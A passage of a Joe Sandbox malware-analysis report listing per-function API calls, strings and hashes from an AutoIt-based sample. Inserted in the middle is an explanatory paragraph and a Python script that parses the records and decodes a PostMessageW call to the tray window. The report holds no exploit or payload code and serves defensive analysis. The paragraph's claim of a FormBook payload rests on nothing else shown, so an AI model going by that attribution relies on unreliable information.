                                                                                  • Instruction Fuzzy Hash: 1001A27564101CABDB04EBA4EA53EFE77B8AF07348F10001DB502B31D2DB946E1897B9
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 0052B76C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 3850602802-1403004172
                                                                                  • Opcode ID: 9a30dba56444ff3b9973b09a3d18d8708299d71864c05b09711cbba0f3da1d66
                                                                                  • Instruction ID: b218473ff28d1e04e17e9978ac8f7121c4eca875ecf27021f93740b78b7eaedf
                                                                                  • Opcode Fuzzy Hash: 9a30dba56444ff3b9973b09a3d18d8708299d71864c05b09711cbba0f3da1d66
                                                                                  • Instruction Fuzzy Hash: 8501A275640118ABDB04E7A4EA43AFE77ACAF06348F14001AB501B31D2DBA45E0997B5
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __calloc_crt
                                                                                  • String ID: "[
                                                                                  • API String ID: 3494438863-3208272576
                                                                                  • Opcode ID: 409f3a896e5d0f18e3c8216ef2459d1cbb1ca844be719b32ef40f08af3cc2dd5
                                                                                  • Instruction ID: 4555e1cdba2d37de04514e7eaa6ef537390d6ff8e2d4fbafc0e2ee9356502a35
                                                                                  • Opcode Fuzzy Hash: 409f3a896e5d0f18e3c8216ef2459d1cbb1ca844be719b32ef40f08af3cc2dd5
                                                                                  • Instruction Fuzzy Hash: D7F0C2752096129AFB689B19FC456EAAFD4F754720F10461AF205CA284E730D8C19FA4
                                                                                  APIs
                                                                                  • LoadImageW.USER32(004F0000,00000063,00000001,00000010,00000010,00000000), ref: 004F4048
                                                                                  • EnumResourceNamesW.KERNEL32(00000000,0000000E,005367E9,00000063,00000000,75A50280,?,?,004F3EE1,?,?,000000FF), ref: 005641B3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumImageLoadNamesResource
                                                                                  • String ID: >O
                                                                                  • API String ID: 1578290342-1134023648
                                                                                  • Opcode ID: 1872a223b932691c9de5b8f131c802516f1decf6bfc16339fcbf8a193998f94e
                                                                                  • Instruction ID: 18c0fa40e38b012c2bcf294ee2ed52c535442d968f4fcd079d0b0e767e7a5568
                                                                                  • Opcode Fuzzy Hash: 1872a223b932691c9de5b8f131c802516f1decf6bfc16339fcbf8a193998f94e
                                                                                  • Instruction Fuzzy Hash: C4F062316407187BD2A05B19BC5AF933F6DE765BB5F500206F314971E0D2F0A188AAA8
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassName_wcscmp
                                                                                  • String ID: #32770
                                                                                  • API String ID: 2292705959-463685578
                                                                                  • Opcode ID: 43f4f5042e8464f0069e6ff59bf86141ad4d4bcf7d9d480400abe7171dda3e9a
                                                                                  • Instruction ID: 4471338ef2118f0bfc2f6bdf61fd75ea8686bf691b52e52052c4cce068904452
                                                                                  • Opcode Fuzzy Hash: 43f4f5042e8464f0069e6ff59bf86141ad4d4bcf7d9d480400abe7171dda3e9a
                                                                                  • Instruction Fuzzy Hash: 27E09277A0422927DB20AAA5AC0AECBFFACFBA5764F01015AB905E3041D670A64587E4
                                                                                  APIs
                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0052A63F
                                                                                    • Part of subcall function 005113F1: _doexit.LIBCMT ref: 005113FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message_doexit
                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                  • API String ID: 1993061046-4017498283
                                                                                  • Opcode ID: fa953eb89145a8047c79ac45577d8d1440c280938bc8c4f3d1c0fae8277e9548
                                                                                  • Instruction ID: 30762a3b8be2be76b1f4dd9ec326270e05e94c1b4f98dee8255753a31f65fcec
                                                                                  • Opcode Fuzzy Hash: fa953eb89145a8047c79ac45577d8d1440c280938bc8c4f3d1c0fae8277e9548
                                                                                  • Instruction Fuzzy Hash: C7D0C23128032833D21436983C1BFC96E88AF56F51F040016BB08A54C24AE6968002EA
                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 0056ACC0
                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0056AEBD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                                  • String ID: WIN_XPe
                                                                                  • API String ID: 510247158-3257408948
                                                                                  • Opcode ID: fd2edb92931bbe7b41a551ef95b0b5198e865280682452046ae2c2f3a01d10ed
                                                                                  • Instruction ID: 9a8466538fe0cf43f3c2d9e5ba17866a9acd5d1409d48e7b48d036f4c189b494
                                                                                  • Opcode Fuzzy Hash: fd2edb92931bbe7b41a551ef95b0b5198e865280682452046ae2c2f3a01d10ed
                                                                                  • Instruction Fuzzy Hash: E1E0C9B0C006499FEB11DBA9D9489ECBBB8BB58301F148585E116B2560DB705E88EF32
                                                                                  APIs
                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005586E2
                                                                                  • PostMessageW.USER32(00000000), ref: 005586E9
                                                                                    • Part of subcall function 00537A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537AD0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 529655941-2988720461
                                                                                  • Opcode ID: ece25aa3a23b24029cb86a7f0988afb4b4d6417a9805c25ae776940e92ed1e7f
                                                                                  • Instruction ID: fc8d1aaa7b4dc855bc1977db5dd3ca14671d051cbff20d08e25ef5a5b1fcbe4f
                                                                                  • Opcode Fuzzy Hash: ece25aa3a23b24029cb86a7f0988afb4b4d6417a9805c25ae776940e92ed1e7f
                                                                                  • Instruction Fuzzy Hash: 7BD0C9717853186BE2746770AC0BFCA6B28AB59B21F100815B649AA1D0C9A0A984A664
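The two records above are near-duplicates of one tray-window routine in the AutoIt runtime: both resolve Shell_TrayWnd via FindWindowW and post it a message, but only the second has all four PostMessageW arguments recovered (Msg 0x111 is WM_COMMAND; wParam 0x197, decimal 407, is the tray's toggle-desktop command id). The script below is an added example for triaging such HCA records, not Joe Sandbox code: it parses the "APIs" blocks into structured calls, pairs the two functions to show which arguments differ, decodes the resolved PostMessageW call, and rebuilds a token signature that reproduces the "API ID" value shown for these records (sorted camel-case words of every call, subcalls included). The sample text is constructed from the two records on this page, and the assumption that Joe Sandbox derives its API ID field exactly this way is the script's own.

```python
"""Parse Joe Sandbox per-function 'APIs' blocks and derive a call signature.

Added example for this report section; not Joe Sandbox code. SAMPLE is
constructed from the two function records shown on the page.
"""
import re

SAMPLE = """\
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005586E2
• PostMessageW.USER32(00000000), ref: 005586E9
  • Part of subcall function 00537A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537AD0
Strings
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005586A2
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005586B5
  • Part of subcall function 00537A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537AD0
Strings
"""

# One bullet line: optional subcall prefix, Api.MODULE(args), ref: address
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<mod>[A-Za-z0-9_]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})\s*$"
)

WM_NAMES = {0x111: "WM_COMMAND"}  # only the message id seen in these records


def parse_records(text):
    """Return one list of parsed calls per 'APIs' heading; any other
    heading ('Strings', ...) closes the current block."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            current.append({
                "api": m["api"], "module": m["mod"],
                "args": m["args"].split(",") if m["args"] else [],
                "ref": m["ref"], "subcall": m["sub"],
            })
        elif stripped:
            current = None
    return records


def camel_tokens(name):
    """Capitalised words of an API name. A trailing W/A width suffix has no
    lowercase tail and is dropped: FindWindowW -> ['Find', 'Window']."""
    return re.findall(r"[A-Z][a-z]+", name)


def api_id(record):
    """Sorted, de-duplicated tokens of every call, subcalls included.
    Matches the 'API ID' shown for these records; that Joe Sandbox uses
    this exact rule is an assumption."""
    tokens = {t for call in record for t in camel_tokens(call["api"])}
    return "".join(sorted(tokens))


def decode_post_message(call):
    """Interpret PostMessageW(hWnd, Msg, wParam, lParam) when all four
    arguments were recovered as hex; None when the sandbox could not."""
    if call["api"] != "PostMessageW" or len(call["args"]) != 4:
        return None
    try:
        hwnd, msg, wparam, lparam = (int(a, 16) for a in call["args"])
    except ValueError:
        return None
    return {"hwnd": hwnd, "msg": WM_NAMES.get(msg, hex(msg)),
            "wParam": wparam, "lParam": lparam}


def diff_records(a, b):
    """Pair calls by API name across two records and list those whose
    recovered arguments differ: (api, args_in_a, args_in_b)."""
    by_name = {c["api"]: c for c in b}
    return [(c["api"], c["args"], by_name[c["api"]]["args"])
            for c in a if c["api"] in by_name and c["args"] != by_name[c["api"]]["args"]]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(api_id(r), [c["api"] for c in r])
    print(diff_records(recs[0], recs[1]))
    print(decode_post_message(recs[1][1]))
```

Running it shows both records share the signature FindMessagePostSleepWindow while differing only in the PostMessageW arguments, which is why they also share String ID and API String ID but carry distinct Opcode IDs. The decoded call is WM_COMMAND with wParam 0x197 sent to Shell_TrayWnd, a window-management idiom of the AutoIt runtime rather than behaviour specific to the FormBook payload, so it is a poor choice for a detection signature on its own.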
                                                                                  APIs
                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005586A2
                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005586B5
                                                                                    • Part of subcall function 00537A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537AD0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 529655941-2988720461
                                                                                  • Opcode ID: ea11dcab26a82ea35349c8f49a208527f1ab48c09ed872b43566cf5842c5f0bd
                                                                                  • Instruction ID: eb3c2b02a4a6ba17e4a974b70202a6fbdd877cb8f888bea390e92d81943d2c3e
                                                                                  • Opcode Fuzzy Hash: ea11dcab26a82ea35349c8f49a208527f1ab48c09ed872b43566cf5842c5f0bd
                                                                                  • Instruction Fuzzy Hash: A2D0C971785318ABE2746770AC0BFCA6F28AF59B21F100815B64DAA1D0C9A0A984A664